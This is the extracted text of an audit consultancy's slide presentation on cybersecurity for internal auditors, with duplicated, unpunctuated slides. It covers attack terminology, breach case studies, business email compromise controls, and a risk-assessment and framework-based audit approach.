bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
